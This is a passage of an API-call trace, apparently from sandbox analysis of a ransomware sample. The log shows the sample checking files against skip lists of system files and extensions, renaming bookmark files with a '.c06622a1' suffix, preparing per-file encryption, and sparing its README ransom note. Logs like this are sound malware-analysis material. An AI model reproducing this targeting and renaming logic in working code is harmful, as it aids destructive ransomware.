0x0 [0159.118] _wcsicmp (_Str1="autorun.inf", _Str2="Microsoft At Work.url") returned -12 [0159.118] wcslen (_String="autorun.inf") returned 0xb [0159.118] _wcsicmp (_Str1="boot.ini", _Str2="Microsoft At Work.url") returned -11 [0159.118] wcslen (_String="boot.ini") returned 0x8 [0159.118] _wcsicmp (_Str1="bootfont.bin", _Str2="Microsoft At Work.url") returned -11 [0159.118] wcslen (_String="bootfont.bin") returned 0xc [0159.118] _wcsicmp (_Str1="bootsect.bak", _Str2="Microsoft At Work.url") returned -11 [0159.119] wcslen (_String="bootsect.bak") returned 0xc [0159.119] _wcsicmp (_Str1="desktop.ini", _Str2="Microsoft At Work.url") returned -9 [0159.119] wcslen (_String="desktop.ini") returned 0xb [0159.119] _wcsicmp (_Str1="iconcache.db", _Str2="Microsoft At Work.url") returned -4 [0159.119] wcslen (_String="iconcache.db") returned 0xc [0159.119] _wcsicmp (_Str1="ntldr", _Str2="Microsoft At Work.url") returned 1 [0159.119] wcslen (_String="ntldr") returned 0x5 [0159.119] _wcsicmp (_Str1="ntuser.dat", _Str2="Microsoft At Work.url") returned 1 [0159.119] wcslen (_String="ntuser.dat") returned 0xa [0159.119] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Microsoft At Work.url") returned 1 [0159.119] wcslen (_String="ntuser.dat.log") returned 0xe [0159.119] _wcsicmp (_Str1="ntuser.ini", _Str2="Microsoft At Work.url") returned 1 [0159.119] wcslen (_String="ntuser.ini") returned 0xa [0159.119] _wcsicmp (_Str1="thumbs.db", _Str2="Microsoft At Work.url") returned 7 [0159.119] wcslen (_String="thumbs.db") returned 0x9 [0159.119] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0159.119] wcslen (_String="386") returned 0x3 [0159.119] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0159.119] wcslen (_String="adv") returned 0x3 [0159.119] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0159.119] wcslen (_String="ani") returned 0x3 [0159.119] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0159.119] wcslen (_String="bat") returned 0x3 [0159.119] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0159.119] wcslen (_String="bin") returned 0x3 [0159.119] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0159.119] wcslen (_String="cab") returned 0x3 [0159.119] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0159.119] wcslen (_String="cmd") returned 0x3 [0159.119] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0159.120] wcslen (_String="com") returned 0x3 [0159.120] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0159.120] wcslen (_String="cpl") returned 0x3 [0159.120] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0159.120] wcslen (_String="cur") returned 0x3 [0159.120] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0159.120] wcslen (_String="deskthemepack") returned 0xd [0159.120] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0159.120] wcslen (_String="diagcab") returned 0x7 [0159.120] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0159.120] wcslen (_String="diagcfg") returned 0x7 [0159.120] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0159.120] wcslen (_String="diagpkg") returned 0x7 [0159.120] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0159.120] wcslen (_String="dll") returned 0x3 [0159.120] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0159.120] wcslen (_String="drv") returned 0x3 [0159.120] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0159.120] wcslen (_String="exe") returned 0x3 [0159.120] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0159.120] wcslen (_String="hlp") returned 0x3 [0159.120] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0159.120] wcslen (_String="icl") returned 0x3 [0159.120] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0159.120] wcslen (_String="icns") returned 0x4 [0159.120] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0159.120] wcslen (_String="ico") returned 0x3 [0159.120] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0159.120] wcslen (_String="ics") returned 0x3 [0159.120] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0159.121] wcslen (_String="idx") returned 0x3 [0159.121] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0159.121] wcslen (_String="ldf") returned 0x3 [0159.121] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0159.121] wcslen (_String="lnk") returned 0x3 [0159.121] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0159.121] wcslen (_String="mod") returned 0x3 [0159.121] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0159.121] wcslen (_String="mpa") returned 0x3 [0159.121] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0159.121] wcslen (_String="msc") returned 0x3 [0159.121] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0159.121] wcslen (_String="msp") returned 0x3 [0159.121] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0159.121] wcslen (_String="msstyles") returned 0x8 [0159.121] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0159.121] wcslen (_String="msu") returned 0x3 [0159.121] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0159.121] wcslen (_String="nls") returned 0x3 [0159.121] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0159.121] wcslen (_String="nomedia") returned 0x7 [0159.121] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0159.121] wcslen (_String="ocx") returned 0x3 [0159.121] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0159.121] wcslen (_String="prf") returned 0x3 [0159.121] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0159.121] wcslen (_String="ps1") returned 0x3 [0159.121] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0159.121] wcslen (_String="rom") returned 0x3 [0159.121] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0159.121] wcslen (_String="rtp") returned 0x3 [0159.121] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0159.121] wcslen (_String="scr") returned 0x3 [0159.121] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0159.121] wcslen (_String="shs") returned 0x3 [0159.122] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0159.122] wcslen (_String="spl") returned 0x3 [0159.122] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0159.122] wcslen (_String="sys") returned 0x3 [0159.122] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0159.122] wcslen (_String="theme") returned 0x5 [0159.122] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0159.122] wcslen (_String="themepack") returned 0x9 [0159.122] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0159.122] wcslen (_String="wpx") returned 0x3 [0159.122] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0159.122] wcslen (_String="lock") returned 0x4 [0159.122] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0159.122] wcslen (_String="key") returned 0x3 [0159.122] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0159.122] wcslen (_String="hta") returned 0x3 [0159.122] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0159.122] wcslen (_String="msi") returned 0x3 [0159.122] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0159.122] wcslen (_String="pdb") returned 0x3 [0159.122] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0159.122] wcslen (_String="sqlite") returned 0x6 [0159.122] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites")) returned 0x10 [0159.122] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.122] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0159.122] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned 0x3e [0159.122] wcscpy (in: _Dest=0x32400de, _Source="Microsoft At Work.url" | out: _Dest="Microsoft At Work.url") returned="Microsoft At Work.url" [0159.122] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url", dwFileAttributes=0x80) returned 1 [0159.123] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0159.123] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0159.123] CloseHandle (hObject=0x1b4) returned 1 [0159.123] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.123] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" [0159.123] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 0x54 [0159.123] wcscpy (in: _Dest=0x3250110, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.123] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.c06622a1"), dwFlags=0x8) returned 1 [0159.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1b4 [0159.125] CreateIoCompletionPort (FileHandle=0x1b4, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0159.125] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2b70020 [0159.132] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x719bee2c [0159.133] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x35edfdd [0159.133] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5f2eef25 [0159.133] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x776a6b4f [0159.133] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x12e22858 [0159.133] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2ebd6666 [0159.133] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x31972c70 [0159.133] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xd54b022 [0159.136] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2b70094, Length=0x80) returned 0x1c0f20e4 [0159.136] RtlComputeCrc32 (PartialCrc=0x20e4, Buffer=0x2b70094, Length=0x80) returned 0xa9d4c421 [0159.136] RtlComputeCrc32 (PartialCrc=0xc421, Buffer=0x2b70094, Length=0x80) returned 0xb35c8eb3 [0159.136] RtlComputeCrc32 (PartialCrc=0x8eb3, Buffer=0x2b70094, Length=0x80) returned 0xcf65c0b3 [0159.136] RtlComputeCrc32 (PartialCrc=0xc0b3, Buffer=0x2b70094, Length=0x80) returned 0x4c096796 [0159.136] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0159.136] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.136] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.136] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0159.136] _wcsicmp (_Str1="Microsoft Store.url", _Str2="README.c06622a1.TXT") returned -5 [0159.136] wcsstr (_Str="Microsoft Store.url", _SubStr="README") returned 0x0 [0159.136] _wcsicmp (_Str1="autorun.inf", _Str2="Microsoft Store.url") returned -12 [0159.136] wcslen (_String="autorun.inf") returned 0xb [0159.136] _wcsicmp (_Str1="boot.ini", _Str2="Microsoft Store.url") returned -11 [0159.136] wcslen (_String="boot.ini") returned 0x8 [0159.136] _wcsicmp (_Str1="bootfont.bin", _Str2="Microsoft Store.url") returned -11 [0159.136] wcslen (_String="bootfont.bin") returned 0xc [0159.137] _wcsicmp (_Str1="bootsect.bak", _Str2="Microsoft Store.url") returned -11 [0159.137] wcslen (_String="bootsect.bak") returned 0xc [0159.137] _wcsicmp (_Str1="desktop.ini", _Str2="Microsoft Store.url") returned -9 [0159.137] wcslen (_String="desktop.ini") returned 0xb [0159.137] _wcsicmp (_Str1="iconcache.db", _Str2="Microsoft Store.url") returned -4 [0159.137] wcslen (_String="iconcache.db") returned 0xc [0159.137] _wcsicmp (_Str1="ntldr", _Str2="Microsoft Store.url") returned 1 [0159.137] wcslen (_String="ntldr") returned 0x5 [0159.137] _wcsicmp (_Str1="ntuser.dat", _Str2="Microsoft Store.url") returned 1 [0159.137] wcslen (_String="ntuser.dat") returned 0xa [0159.137] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Microsoft Store.url") returned 1 [0159.137] wcslen (_String="ntuser.dat.log") returned 0xe [0159.137] _wcsicmp (_Str1="ntuser.ini", _Str2="Microsoft Store.url") returned 1 [0159.137] wcslen (_String="ntuser.ini") returned 0xa [0159.137] _wcsicmp (_Str1="thumbs.db", _Str2="Microsoft Store.url") returned 7 [0159.137] wcslen (_String="thumbs.db") returned 0x9 [0159.137] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0159.137] wcslen (_String="386") returned 0x3 [0159.137] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0159.137] wcslen (_String="adv") returned 0x3 [0159.137] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0159.137] wcslen (_String="ani") returned 0x3 [0159.137] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0159.137] wcslen (_String="bat") returned 0x3 [0159.137] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0159.137] wcslen (_String="bin") returned 0x3 [0159.137] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0159.137] wcslen (_String="cab") returned 0x3 [0159.137] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0159.137] wcslen (_String="cmd") returned 0x3 [0159.137] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0159.138] wcslen (_String="com") returned 0x3 [0159.138] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0159.138] wcslen (_String="cpl") returned 0x3 [0159.138] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0159.138] wcslen (_String="cur") returned 0x3 [0159.138] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0159.138] wcslen (_String="deskthemepack") returned 0xd [0159.138] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0159.138] wcslen (_String="diagcab") returned 0x7 [0159.138] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0159.138] wcslen (_String="diagcfg") returned 0x7 [0159.138] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0159.138] wcslen (_String="diagpkg") returned 0x7 [0159.138] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0159.138] wcslen (_String="dll") returned 0x3 [0159.138] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0159.138] wcslen (_String="drv") returned 0x3 [0159.138] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0159.138] wcslen (_String="exe") returned 0x3 [0159.138] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0159.138] wcslen (_String="hlp") returned 0x3 [0159.138] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0159.138] wcslen (_String="icl") returned 0x3 [0159.138] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0159.138] wcslen (_String="icns") returned 0x4 [0159.138] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0159.138] wcslen (_String="ico") returned 0x3 [0159.138] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0159.138] wcslen (_String="ics") returned 0x3 [0159.138] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0159.138] wcslen (_String="idx") returned 0x3 [0159.138] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0159.138] wcslen (_String="ldf") returned 0x3 [0159.138] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0159.139] wcslen (_String="lnk") returned 0x3 [0159.139] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0159.139] wcslen (_String="mod") returned 0x3 [0159.139] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0159.139] wcslen (_String="mpa") returned 0x3 [0159.139] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0159.139] wcslen (_String="msc") returned 0x3 [0159.139] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0159.139] wcslen (_String="msp") returned 0x3 [0159.139] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0159.139] wcslen (_String="msstyles") returned 0x8 [0159.139] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0159.139] wcslen (_String="msu") returned 0x3 [0159.139] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0159.139] wcslen (_String="nls") returned 0x3 [0159.139] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0159.139] wcslen (_String="nomedia") returned 0x7 [0159.139] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0159.139] wcslen (_String="ocx") returned 0x3 [0159.139] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0159.139] wcslen (_String="prf") returned 0x3 [0159.139] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0159.139] wcslen (_String="ps1") returned 0x3 [0159.139] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0159.139] wcslen (_String="rom") returned 0x3 [0159.139] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0159.139] wcslen (_String="rtp") returned 0x3 [0159.139] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0159.140] wcslen (_String="scr") returned 0x3 [0159.140] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0159.140] wcslen (_String="shs") returned 0x3 [0159.140] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0159.140] wcslen (_String="spl") returned 0x3 [0159.140] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0159.140] wcslen (_String="sys") returned 0x3 [0159.140] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0159.140] wcslen (_String="theme") returned 0x5 [0159.140] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0159.140] wcslen (_String="themepack") returned 0x9 [0159.140] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0159.140] wcslen (_String="wpx") returned 0x3 [0159.140] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0159.140] wcslen (_String="lock") returned 0x4 [0159.140] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0159.140] wcslen (_String="key") returned 0x3 [0159.140] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0159.140] wcslen (_String="hta") returned 0x3 [0159.140] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0159.140] wcslen (_String="msi") returned 0x3 [0159.140] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0159.140] wcslen (_String="pdb") returned 0x3 [0159.140] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0159.140] wcslen (_String="sqlite") returned 0x6 [0159.140] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites")) returned 0x10 [0159.140] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.141] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0159.141] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned 0x3e [0159.141] wcscpy (in: _Dest=0x32400de, _Source="Microsoft Store.url" | out: _Dest="Microsoft Store.url") returned="Microsoft Store.url" [0159.141] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url", dwFileAttributes=0x80) returned 1 [0159.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0159.141] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0159.141] CloseHandle (hObject=0x1c0) returned 1 [0159.141] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.141] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" [0159.141] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 0x52 [0159.141] wcscpy (in: _Dest=0x325010c, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.141] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.c06622a1"), dwFlags=0x8) returned 1 [0159.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c0 [0159.147] CreateIoCompletionPort (FileHandle=0x1c0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0159.147] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3480020 [0159.154] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1b3a75a4 [0159.154] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1140d584 [0159.154] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x29a8a961 [0159.154] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x39d58471 [0159.154] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x18609d33 [0159.154] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2bd2c596 [0159.154] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x43544239 [0159.154] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3cd4b07c [0159.157] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3480094, Length=0x80) returned 0xaefddfaf [0159.157] RtlComputeCrc32 (PartialCrc=0xdfaf, Buffer=0x3480094, Length=0x80) returned 0x4f973a25 [0159.157] RtlComputeCrc32 (PartialCrc=0x3a25, Buffer=0x3480094, Length=0x80) returned 0x9774d184 [0159.157] RtlComputeCrc32 (PartialCrc=0xd184, Buffer=0x3480094, Length=0x80) returned 0x8f7dfb6d [0159.158] RtlComputeCrc32 (PartialCrc=0xfb6d, Buffer=0x3480094, Length=0x80) returned 0x56d9428 [0159.158] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0159.158] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.158] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.158] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c7f0500, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8c7f0500, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8c7f0500, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0159.158] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0159.158] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0159.158] FindClose (in: hFindFile=0x154188 | out: hFindFile=0x154188) returned 1 [0159.158] _wcsicmp (_Str1="backup", _Str2="Microsoft Websites") returned -11 [0159.158] wcslen (_String="backup") returned 0x6 [0159.158] _wcsicmp (_Str1="bak", _Str2="Microsoft Websites") returned -11 [0159.158] wcslen (_String="bak") returned 0x3 [0159.158] _wcsicmp (_Str1="back", _Str2="Microsoft Websites") returned -11 [0159.158] wcslen (_String="back") returned 0x4 [0159.158] _wcsicmp (_Str1="archive", _Str2="Microsoft Websites") returned -12 [0159.158] wcslen (_String="archive") 